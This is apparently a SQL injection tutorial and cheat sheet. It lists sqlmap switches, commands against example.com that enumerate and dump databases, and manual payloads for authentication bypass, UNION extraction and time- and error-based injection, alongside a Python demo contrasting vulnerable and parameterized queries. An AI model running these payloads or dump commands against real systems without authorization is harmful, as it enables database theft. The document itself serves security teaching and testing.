sqlmap is a tool for testing SQL injection (SQLi), an attack that manipulates a web application's database by injecting malicious SQL statements into a query. SQLi is one of the most common web application vulnerabilities, often allowing attackers to access or modify sensitive data. Penetration testers and ethical hackers use SQLi techniques to identify and demonstrate potential vulnerabilities in applications, providing crucial insight into the security posture of the system.
Types of SQLi Attacks:
- Error-Based SQLi: Uses error messages from the database to gain insights into the structure and contents of the database.
- Union-Based SQLi: Combines results from multiple queries to retrieve hidden data from the database.
- Boolean-Based Blind SQLi: Tests for vulnerabilities by evaluating the response to true/false conditions without seeing actual database output.
- Time-Based Blind SQLi: Uses database delay functions to determine vulnerability by observing the response time.
Common SQL Injection Payloads and Techniques
- AND 1=1: Checks for vulnerability by adding a simple condition that is always true. If the application behaves differently, it could be vulnerable.
- UNION SELECT: Combines the results of a separate query, allowing access to data from other tables.
- OR 'a'='a': Often used in login forms to bypass authentication.
Tools and Commands for SQL Injection Testing
Many tools are available to automate SQLi tests. Below are popular commands and options in some of the most widely used tools:
sqlmap
sqlmap is an open-source tool for automating SQL injection detection and exploitation. It supports a variety of SQL injection techniques and offers options to enumerate databases, tables, columns, and more.
Common sqlmap switches:
- -u <URL>: Specifies the target URL where the SQL injection test will run.
- --dbs: Enumerates databases to find accessible ones.
- --tables: Lists tables within a specified database.
- --columns: Displays columns within a table.
- --dump: Extracts data from specified columns.
- -D <database>: Specifies the database to target in further commands.
- -T <table>: Specifies the table for extraction.
- -C <columns>: Selects specific columns for data retrieval.
- --level: Sets the intensity of tests (default is 1, higher values run more in-depth tests).
- --risk: Specifies the level of risk (1-3) to adapt payloads based on expected impact.
Example sqlmap commands:
- Check for vulnerability:
> sqlmap -u "http://example.com/item?id=1" --batch
This command performs a basic scan on the specified URL without prompting for user interaction.
- Enumerate databases:
> sqlmap -u "http://example.com/item?id=1" --dbs
This command retrieves a list of available databases.
- Dump all records from a table:
> sqlmap -u "http://example.com/item?id=1" -D database_name -T table_name --dump
Manual SQL Injection Commands
For applications that require manual testing, here are some SQL payloads that are often used to test various injection points:
- Extract Database Version:
> SELECT @@version
This command reveals the version of the database. The @@version variable exists on MySQL and Microsoft SQL Server; other database engines expose the version through different functions.
- Union-Based Payload:
> ' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users'--
- Authentication Bypass:
> ' OR '1'='1'--
This payload is often used in login forms to bypass authentication by creating a condition that is always true.
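To show why the AND 1=1 check and the authentication-bypass payload above work, and what stops them, here is an added example (not part of the original page) using an in-memory SQLite database with constructed sample rows. It places a string-concatenated query beside its parameterized replacement; the hypothetical item lookup stands in for a handler behind a URL such as /item?id=1.

```python
import sqlite3

def make_db():
    # Constructed sample data for the demo, not taken from any real system.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'widget')")
    return conn

def login_vulnerable(conn, username, password):
    # Input is spliced into the SQL text, so quotes and comments are parsed as SQL.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_parameterized(conn, username, password):
    # Placeholders: values travel separately from the statement and are never parsed.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

def item_vulnerable(conn, item_id):
    # Unquoted numeric concatenation, as in a hypothetical handler behind /item?id=1.
    rows = conn.execute("SELECT name FROM items WHERE id = " + item_id).fetchall()
    return [r[0] for r in rows]

def item_parameterized(conn, item_id):
    # Validate the type first, then bind; a value like "1 AND 1=2" is rejected.
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (int(item_id),)).fetchall()
    return [r[0] for r in rows]

def demo():
    conn = make_db()
    bypass = "' OR '1'='1'--"  # authentication-bypass payload from the page
    results = {
        "bypass_vs_vulnerable": login_vulnerable(conn, bypass, "wrong"),       # True
        "bypass_vs_parameterized": login_parameterized(conn, bypass, "wrong"), # False
        "boolean_true_vulnerable": item_vulnerable(conn, "1 AND 1=1"),         # ['widget']
        "boolean_false_vulnerable": item_vulnerable(conn, "1 AND 1=2"),        # []
    }
    try:
        item_parameterized(conn, "1 AND 1=1")
        results["boolean_vs_parameterized"] = "accepted"
    except ValueError:
        results["boolean_vs_parameterized"] = "rejected"
    return results
```

The differing results for "1 AND 1=1" and "1 AND 1=2" against the vulnerable lookup are exactly the signal a boolean-based blind test looks for; the parameterized versions give the attacker no such lever.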
Advanced SQLi Techniques
- Time-Based SQL Injection:
> ' OR IF(1=1,SLEEP(5),0)--
This payload checks for vulnerability by causing a delay in the database response if the condition is true (IF and SLEEP are MySQL functions; other engines use their own delay functions).
- Error-Based SQL Injection:
> ' AND 1=CONVERT(int, (SELECT COUNT(*) FROM information_schema.tables))--
This type leverages error messages to reveal information about the database structure; the CONVERT(int, ...) form shown here is Microsoft SQL Server syntax.
Examples and Use Cases
Identify Available Databases:
> sqlmap -u "http://example.com/item?id=1" --dbs
This command will reveal databases accessible through the vulnerable endpoint.
Test for Blind SQL Injection:
Using time-based techniques with sqlmap:
> sqlmap -u "http://example.com/item?id=1" --time-sec=5
Setting a delay parameter helps detect vulnerabilities without visible feedback.
Full Exploitation Example
Assume a URL with a vulnerable id parameter:
> sqlmap -u "http://example.com/item?id=1" --dbs --tables --columns --dump
This command will enumerate databases, tables, columns, and retrieve the data if possible, fully exploiting the vulnerability.